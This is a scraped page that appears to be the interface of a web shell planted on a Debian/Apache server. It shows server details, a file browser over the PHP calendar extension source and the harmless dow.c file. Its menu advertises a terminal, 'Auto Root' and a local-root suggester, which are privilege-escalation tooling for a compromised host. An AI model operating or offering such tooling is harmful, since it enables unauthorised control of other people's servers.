Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
calendar /
Delete
Unzip
Name
Size
Permission
Date
Action
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
CREDITS
72
B
-rw-rw-r--
2022-10-31 11:36
cal_unix.c
2.31
KB
-rw-rw-r--
2022-10-31 11:36
calendar.c
20.65
KB
-rw-rw-r--
2022-10-31 11:36
config.m4
357
B
-rw-rw-r--
2022-10-31 11:36
config.w32
269
B
-rw-rw-r--
2022-10-31 11:36
dow.c
1.38
KB
-rw-rw-r--
2022-10-31 11:36
easter.c
4.26
KB
-rw-rw-r--
2022-10-31 11:36
french.c
4.59
KB
-rw-rw-r--
2022-10-31 11:36
gregor.c
7.45
KB
-rw-rw-r--
2022-10-31 11:36
jewish.c
26.04
KB
-rw-rw-r--
2022-10-31 11:36
julian.c
7.85
KB
-rw-rw-r--
2022-10-31 11:36
php_calendar.h
1.2
KB
-rw-rw-r--
2022-10-31 11:36
sdncal.h
4.1
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
/* $selId: dow.c,v 2.0 1995/10/24 01:13:06 lees Exp $ * Copyright 1993-1995, Scott E. Lee, all rights reserved. * Permission granted to use, copy, modify, distribute and sell so long as * the above copyright and this permission statement are retained in all * copies. THERE IS NO WARRANTY - USE AT YOUR OWN RISK. */ /************************************************************************** * * These are the externally visible components of this file: * * int * DayOfWeek( * long int sdn); * * Convert a SDN to a day-of-week number (0 to 6). Where 0 stands for * Sunday, 1 for Monday, etc. and 6 stands for Saturday. * * char *DayNameShort[7]; * * Convert a day-of-week number (0 to 6), as returned from DayOfWeek(), to * the abbreviated (three character) name of the day. * * char *DayNameLong[7]; * * Convert a day-of-week number (0 to 6), as returned from DayOfWeek(), to * the name of the day. * **************************************************************************/ #include "sdncal.h" int DayOfWeek( zend_long sdn) { int dow; dow = (sdn + 1) % 7; if (dow >= 0) { return (dow); } else { return (dow + 7); } } const char * const DayNameShort[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" }; const char * const DayNameLong[7] = { "Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday" };